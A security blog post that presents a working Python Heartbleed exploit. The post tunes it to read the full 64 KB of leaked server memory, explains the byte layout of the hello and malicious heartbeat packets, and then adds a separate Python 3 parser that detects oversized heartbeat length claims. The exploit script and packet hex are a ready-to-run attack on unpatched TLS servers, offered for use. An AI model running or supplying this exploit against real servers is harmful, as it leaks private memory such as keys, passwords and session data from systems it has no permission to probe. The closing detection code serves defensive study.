Cugu's blog

IT security & forensics


Heartbleed exploit

Heartbleed exploits are spread all over the web. Lots of them are written in Python. A simple one uses just seven lines of code, and it works quite well. The drawback: you only get 8 KB of data. Heartbleed offers 64 KB!

A single socket.recv() call limits the number of bytes that can be received. So let's replace it with the recv_all function from zamaros' GitHub. Voilà:

    import socket, select

    # receive multiple packets until `length` bytes arrived, the server
    # stopped sending, or the connection was closed
    def recv_all(sock, length):
        response = ''
        bytes_left = length
        while bytes_left > 0:
            # wait up to 5 seconds for readable data
            r, w, e = select.select([sock], [], [], 5)
            if sock not in r:
                # timeout: the server has nothing more to send
                break
            data = sock.recv(bytes_left)
            if not data:
                # empty read means the peer closed the connection
                break
            response += data
            bytes_left -= len(data)
        return response

    # create socket
    sh = socket.socket()
    # open socket to server
    sh.connect(("server.com", 1337))
    # send hello packet
    sh.send("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex'))
    # receive and ignore answer
    helloresponse = sh.recv(8196)
    # send bad heartbleed packet
    sh.send("180302000401FFFF2F".decode('hex'))
    # show answer
    print recv_all(sh, 65535)

The script is still simple and you get more data! Awesome!

packet

The structure of the hello packet and the heartbeat packet is as follows:

hello packet

16 03 02 00 31      # TLS Header
01 00 00 2d         # Handshake header
03 02               # ClientHello field: version number (TLS 1.1)
50 0b af bb b7 5a b8 3e f0 ab 9a e3 f3 9c 63 15 \
33 41 37 ac fd 6c 18 1a 24 60 dc 49 67 c2 fd 96 # ClientHello field: random
00                  # ClientHello field: session id
00 04               # ClientHello field: cipher suite length
00 33 c0 11         # ClientHello field: cipher suite(s)
01                  # ClientHello field: compression support, length
00                  # ClientHello field: compression support, no compression (0)
00 00               # ClientHello field: extension length (0)

malicious heartbeat packet

18          # type              (Heartbeat)
03 02       # tls_revision      (TLS1.1)
00 04       # payload_length    (4)
01          # type              (Request)
FF FF       # claimed_length    (65535)
2F          # payload           (0x2f, random)
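To make the two layouts above concrete from the receiving side, here is an added Python 3 example (not code from the blog post) that parses both records byte by byte and applies the bounds check a patched peer performs: the heartbeat's claimed payload length plus the fixed 3 header bytes and the 16 padding bytes RFC 6520 requires must fit inside the TLS record. The hex strings for the ClientHello and the malicious heartbeat are copied from the post; the benign heartbeat is constructed here for comparison, and the field names in the returned dictionaries are this example's own choice.

```python
import struct

# Both records below are the hex strings from the blog post above.
CLIENT_HELLO_HEX = ("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd"
                    "6c181a2460dc4967c2fd960000040033c01101000000")
MALICIOUS_HEARTBEAT_HEX = "180302000401FFFF2F"
# Constructed for comparison (not from the post): a well-formed heartbeat
# request with one payload byte, claimed length 1 and 16 bytes of padding.
BENIGN_HEARTBEAT_HEX = "1803020014" + "01" + "0001" + "2f" + "00" * 16

TLS_HANDSHAKE = 0x16
TLS_HEARTBEAT = 0x18
HEARTBEAT_MIN_PADDING = 16   # RFC 6520 requires at least 16 padding bytes


def parse_record(data):
    """Split one TLS record into its 5-byte header fields and its body."""
    if len(data) < 5:
        raise ValueError("truncated TLS record header")
    content_type, major, minor, length = struct.unpack("!BBBH", data[:5])
    body = data[5:5 + length]
    if len(body) != length:
        raise ValueError("record body shorter than its length field")
    return {"type": content_type, "version": (major, minor),
            "length": length, "body": body}


def check_heartbeat(record):
    """Bounds-check a heartbeat message: type (1) + payload_length (2)
    + claimed payload + minimum padding (16) must fit in the record."""
    if record["type"] != TLS_HEARTBEAT:
        raise ValueError("not a heartbeat record")
    body = record["body"]
    if len(body) < 3:
        return {"ok": False, "reason": "heartbeat shorter than its fixed fields"}
    hb_type = body[0]
    claimed = struct.unpack("!H", body[1:3])[0]
    available = len(body) - 3   # payload bytes actually present in the record
    result = {"hb_type": hb_type, "claimed_length": claimed,
              "available_payload": available}
    if 1 + 2 + claimed + HEARTBEAT_MIN_PADDING > record["length"]:
        result.update(ok=False, reason="claimed payload length exceeds the record")
    else:
        result.update(ok=True, reason="payload length consistent with the record")
    return result


def parse_client_hello(record):
    """Walk the ClientHello fields in the order the post lists them."""
    if record["type"] != TLS_HANDSHAKE:
        raise ValueError("not a handshake record")
    body = record["body"]
    hs_type = body[0]
    hs_len = int.from_bytes(body[1:4], "big")
    if hs_type != 1 or hs_len != len(body) - 4:
        raise ValueError("not a well-formed ClientHello handshake header")
    p = 4
    version = (body[p], body[p + 1])
    p += 2
    random_bytes = body[p:p + 32]
    p += 32
    sid_len = body[p]
    p += 1
    session_id = body[p:p + sid_len]
    p += sid_len
    cs_len = struct.unpack("!H", body[p:p + 2])[0]
    p += 2
    cipher_suites = [struct.unpack("!H", body[i:i + 2])[0]
                     for i in range(p, p + cs_len, 2)]
    p += cs_len
    comp_len = body[p]
    p += 1
    compression = list(body[p:p + comp_len])
    p += comp_len
    ext_len = struct.unpack("!H", body[p:p + 2])[0]
    return {"version": version, "random": random_bytes.hex(),
            "session_id": session_id.hex(), "cipher_suites": cipher_suites,
            "compression": compression, "extensions_length": ext_len}


def audit_heartbeat_hex(hex_string):
    """Hex string in, bounds-check result out."""
    return check_heartbeat(parse_record(bytes.fromhex(hex_string)))


if __name__ == "__main__":
    hello = parse_client_hello(parse_record(bytes.fromhex(CLIENT_HELLO_HEX)))
    print("ClientHello version %r, cipher suites %s"
          % (hello["version"], [hex(c) for c in hello["cipher_suites"]]))
    for name, h in (("malicious", MALICIOUS_HEARTBEAT_HEX),
                    ("benign", BENIGN_HEARTBEAT_HEX)):
        print(name, audit_heartbeat_hex(h))
```

Run as a script it prints the negotiated version and cipher suites from the hello packet, then flags the post's heartbeat (claimed length 65535, one payload byte actually present in a 4-byte record) while accepting the constructed benign one. The same comparison is what an IDS signature or a hardened TLS stack applies to every inbound heartbeat; an unpatched responder skips it and copies the claimed number of bytes from its own memory into the reply, which is exactly the 64 KB the post's recv_all collects.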